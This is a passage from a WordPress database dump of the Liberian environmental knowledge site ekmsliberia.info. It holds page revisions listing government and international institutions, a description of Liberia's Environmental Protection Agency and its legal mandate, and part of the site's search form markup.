14:16:17','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 14:16:17','2021-08-17 14:16:17','',91,'https://ekmsliberia.info/?p=3874',0,'revision','',0),(3875,38,'2021-08-17 14:16:17','2021-08-17 14:16:17','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 14:16:17','2021-08-17 14:16:17','',91,'https://ekmsliberia.info/?p=3875',0,'revision','',0),(3876,38,'2021-08-17 14:16:18','2021-08-17 14:16:18','<h2>Access environmental reports, publications, policies and other related documents</h2>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 14:16:18','2021-08-17 14:16:18','',91,'https://ekmsliberia.info/?p=3876',0,'revision','',0),(3877,38,'2021-08-17 14:45:24','2021-08-17 14:45:24','','Institutions-loop','','publish','closed','closed','','institutions-loop','','','2021-08-17 14:50:31','2021-08-17 14:50:31','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=3877',0,'elementor_library','',0),(3878,38,'2021-08-17 14:50:30','2021-08-17 14:50:30','','Institutions-loop','','inherit','closed','closed','','3877-revision-v1','','','2021-08-17 14:50:30','2021-08-17 14:50:30','',3877,'https://ekmsliberia.info/?p=3878',0,'revision','',0),(3879,38,'2021-08-17 14:50:31','2021-08-17 14:50:31','','Institutions-loop','','inherit','closed','closed','','3877-revision-v1','','','2021-08-17 14:50:31','2021-08-17 14:50:31','',3877,'https://ekmsliberia.info/?p=3879',0,'revision','',0),(3880,38,'2021-08-17 14:54:46','2021-08-17 14:54:46','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_epa_page.jpg\" alt=\"Environmental Protection Agency\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fda0.jpg\" alt=\"Forestry Development Authority\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme.jpg\" alt=\"Ministry of Mines and Energy\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_lisgis.jpg\" alt=\"Liberia Institute for Statistics and Geo-Information Services\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_wash.jpg\" alt=\"Liberia National Water, Sanitation and Hygiene - WASH Commission\" width=\"1024\" height=\"522\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia/\">Liberia National Water, Sanitation and Hygiene - WASH Commission</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Featured_lla.jpg\" alt=\"Liberia Land Authority\" width=\"1024\" height=\"502\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ffi.png\" alt=\"Fauna &amp; Flora International\" width=\"1024\" height=\"504\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/conservation-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ci.jpg\" alt=\"Conservation International\" width=\"1024\" height=\"523\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-finance-and-development-planning/\">Ministry of Finance and Development Planning</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 14:54:46','2021-08-17 14:54:46','',89,'https://ekmsliberia.info/?p=3880',0,'revision','',0),(3881,38,'2021-08-17 14:54:46','2021-08-17 14:54:46','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_epa_page.jpg\" alt=\"Environmental Protection Agency\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fda0.jpg\" alt=\"Forestry Development Authority\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme.jpg\" alt=\"Ministry of Mines and Energy\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_lisgis.jpg\" alt=\"Liberia Institute for Statistics and Geo-Information Services\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_wash.jpg\" alt=\"Liberia National Water, Sanitation and Hygiene - WASH Commission\" width=\"1024\" height=\"522\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia/\">Liberia National Water, Sanitation and Hygiene - WASH Commission</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Featured_lla.jpg\" alt=\"Liberia Land Authority\" width=\"1024\" height=\"502\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ffi.png\" alt=\"Fauna &amp; Flora International\" width=\"1024\" height=\"504\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/conservation-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ci.jpg\" alt=\"Conservation International\" width=\"1024\" height=\"523\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-finance-and-development-planning/\">Ministry of Finance and Development Planning</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 14:54:46','2021-08-17 14:54:46','',89,'https://ekmsliberia.info/?p=3881',0,'revision','',0),(3882,38,'2021-08-17 14:54:46','2021-08-17 14:54:46','<h2>Institutions</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 14:54:46','2021-08-17 14:54:46','',89,'https://ekmsliberia.info/?p=3882',0,'revision','',0),(3883,38,'2021-08-17 14:56:46','2021-08-17 14:56:46','<h2>Institutions</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 14:56:46','2021-08-17 14:56:46','',89,'https://ekmsliberia.info/?p=3883',0,'revision','',0),(3884,38,'2021-08-17 14:56:46','2021-08-17 14:56:46','<h2>Institutions</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 14:56:46','2021-08-17 14:56:46','',89,'https://ekmsliberia.info/?p=3884',0,'revision','',0),(3885,38,'2021-08-17 14:56:47','2021-08-17 14:56:47','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 14:56:47','2021-08-17 14:56:47','',89,'https://ekmsliberia.info/?p=3885',0,'revision','',0),(3886,38,'2021-08-17 14:58:07','2021-08-17 14:58:07','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 14:58:07','2021-08-17 14:58:07','',89,'https://ekmsliberia.info/?p=3886',0,'revision','',0),(3887,38,'2021-08-17 14:58:07','2021-08-17 14:58:07','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 14:58:07','2021-08-17 14:58:07','',89,'https://ekmsliberia.info/?p=3887',0,'revision','',0),(3888,38,'2021-08-17 14:58:08','2021-08-17 14:58:08','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 14:58:08','2021-08-17 14:58:08','',89,'https://ekmsliberia.info/?p=3888',0,'revision','',0),(3889,38,'2021-08-17 15:02:07','2021-08-17 15:02:07','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:02:07','2021-08-17 15:02:07','',89,'https://ekmsliberia.info/?p=3889',0,'revision','',0),(3890,38,'2021-08-17 15:02:07','2021-08-17 15:02:07','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:02:07','2021-08-17 15:02:07','',89,'https://ekmsliberia.info/?p=3890',0,'revision','',0),(3891,38,'2021-08-17 15:02:07','2021-08-17 15:02:07','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:02:07','2021-08-17 15:02:07','',89,'https://ekmsliberia.info/?p=3891',0,'revision','',0),(3892,38,'2021-08-17 15:02:47','2021-08-17 15:02:47','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:02:47','2021-08-17 15:02:47','',89,'https://ekmsliberia.info/?p=3892',0,'revision','',0),(3893,38,'2021-08-17 15:02:47','2021-08-17 15:02:47','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:02:47','2021-08-17 15:02:47','',89,'https://ekmsliberia.info/?p=3893',0,'revision','',0),(3894,38,'2021-08-17 15:02:47','2021-08-17 15:02:47','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:02:47','2021-08-17 15:02:47','',89,'https://ekmsliberia.info/?p=3894',0,'revision','',0),(3895,38,'2021-08-17 15:02:54','2021-08-17 15:02:54','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:02:54','2021-08-17 15:02:54','',89,'https://ekmsliberia.info/?p=3895',0,'revision','',0),(3896,38,'2021-08-17 15:02:54','2021-08-17 15:02:54','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:02:54','2021-08-17 15:02:54','',89,'https://ekmsliberia.info/?p=3896',0,'revision','',0),(3897,38,'2021-08-17 15:02:54','2021-08-17 15:02:54','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:02:54','2021-08-17 15:02:54','',89,'https://ekmsliberia.info/?p=3897',0,'revision','',0),(3898,38,'2021-08-17 15:07:14','2021-08-17 15:07:14','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:07:14','2021-08-17 15:07:14','',89,'https://ekmsliberia.info/?p=3898',0,'revision','',0),(3899,38,'2021-08-17 15:07:14','2021-08-17 15:07:14','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:07:14','2021-08-17 15:07:14','',89,'https://ekmsliberia.info/?p=3899',0,'revision','',0),(3900,38,'2021-08-17 15:07:15','2021-08-17 15:07:15','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2021-08-17 15:07:15','2021-08-17 15:07:15','',89,'https://ekmsliberia.info/?p=3900',0,'revision','',0),(3901,38,'2021-08-17 15:09:51','2021-08-17 15:09:51','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','publish','closed','closed','','institutions-single-post','','','2022-02-16 12:51:26','2022-02-16 12:51:26','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=3901',0,'elementor_library','',0),(3902,38,'2021-08-17 15:14:12','2021-08-17 15:14:12','','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 15:14:12','2021-08-17 15:14:12','',3901,'https://ekmsliberia.info/?p=3902',0,'revision','',0),(3903,38,'2021-08-17 15:14:12','2021-08-17 15:14:12','','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 15:14:12','2021-08-17 15:14:12','',3901,'https://ekmsliberia.info/?p=3903',0,'revision','',0),(3905,38,'2021-08-17 15:19:15','2021-08-17 15:19:15','','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 15:19:15','2021-08-17 15:19:15','',3901,'https://ekmsliberia.info/?p=3905',0,'revision','',0),(3906,38,'2021-08-17 15:25:42','2021-08-17 15:25:42','','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 15:25:42','2021-08-17 15:25:42','',3901,'https://ekmsliberia.info/?p=3906',0,'revision','',0),(3907,38,'2021-08-17 15:26:27','2021-08-17 15:26:27','','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 15:26:27','2021-08-17 15:26:27','',3901,'https://ekmsliberia.info/?p=3907',0,'revision','',0),(3908,38,'2021-08-17 15:29:39','2021-08-17 15:29:39','The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.\n\nThe EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.\n\nThe Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.\n\nThe Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.\n<h5>Mandate</h5>\nThe Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.\n','Environmental Protection Agency','','inherit','closed','closed','','1582-autosave-v1','','','2021-08-17 15:29:39','2021-08-17 15:29:39','',1582,'https://ekmsliberia.info/?p=3908',0,'revision','',0),(3909,38,'2021-08-17 15:29:54','2021-08-17 15:29:54','The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.\r\n\r\nThe EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.\r\n\r\nThe Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.\r\n\r\nThe Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.\r\n<h5>Mandate</h5>\r\nThe Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.\r\n','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2021-08-17 15:29:54','2021-08-17 15:29:54','',1582,'https://ekmsliberia.info/?p=3909',0,'revision','',0),(3910,38,'2021-08-17 15:36:16','2021-08-17 15:36:16','','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 15:36:16','2021-08-17 15:36:16','',3901,'https://ekmsliberia.info/?p=3910',0,'revision','',0),(3911,38,'2021-08-17 15:36:43','2021-08-17 15:36:43','','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 15:36:43','2021-08-17 15:36:43','',3901,'https://ekmsliberia.info/?p=3911',0,'revision','',0),(3912,38,'2021-08-17 15:56:02','2021-08-17 15:56:02','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 15:56:02','2021-08-17 15:56:02','',3901,'https://ekmsliberia.info/?p=3912',0,'revision','',0),(3914,38,'2021-08-17 16:04:37','2021-08-17 16:04:37','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:04:37','2021-08-17 16:04:37','',3901,'https://ekmsliberia.info/?p=3914',0,'revision','',0),(3915,38,'2021-08-17 16:04:59','2021-08-17 16:04:59','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:04:59','2021-08-17 16:04:59','',3901,'https://ekmsliberia.info/?p=3915',0,'revision','',0),(3916,38,'2021-08-17 16:05:17','2021-08-17 16:05:17','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:05:17','2021-08-17 16:05:17','',3901,'https://ekmsliberia.info/?p=3916',0,'revision','',0),(3917,38,'2021-08-17 16:05:52','2021-08-17 16:05:52','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:05:52','2021-08-17 16:05:52','',3901,'https://ekmsliberia.info/?p=3917',0,'revision','',0),(3918,38,'2021-08-17 16:07:12','2021-08-17 16:07:12','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:07:12','2021-08-17 16:07:12','',3901,'https://ekmsliberia.info/?p=3918',0,'revision','',0),(3919,38,'2021-08-17 16:07:55','2021-08-17 16:07:55','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:07:55','2021-08-17 16:07:55','',3901,'https://ekmsliberia.info/?p=3919',0,'revision','',0),(3920,38,'2021-08-17 16:08:41','2021-08-17 16:08:41','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:08:41','2021-08-17 16:08:41','',3901,'https://ekmsliberia.info/?p=3920',0,'revision','',0),(3921,38,'2021-08-17 16:09:58','2021-08-17 16:09:58','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:09:58','2021-08-17 16:09:58','',3901,'https://ekmsliberia.info/?p=3921',0,'revision','',0),(3922,38,'2021-08-17 16:10:44','2021-08-17 16:10:44','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:10:44','2021-08-17 16:10:44','',3901,'https://ekmsliberia.info/?p=3922',0,'revision','',0),(3923,38,'2021-08-17 16:11:48','2021-08-17 16:11:48','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:11:48','2021-08-17 16:11:48','',3901,'https://ekmsliberia.info/?p=3923',0,'revision','',0),(3924,38,'2021-08-17 16:14:11','2021-08-17 16:14:11','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:14:11','2021-08-17 16:14:11','',3901,'https://ekmsliberia.info/?p=3924',0,'revision','',0),(3925,38,'2021-08-17 16:14:47','2021-08-17 16:14:47','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-17 16:14:47','2021-08-17 16:14:47','',3901,'https://ekmsliberia.info/?p=3925',0,'revision','',0),(3927,38,'2021-08-17 16:25:02','2021-08-17 16:25:02','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" 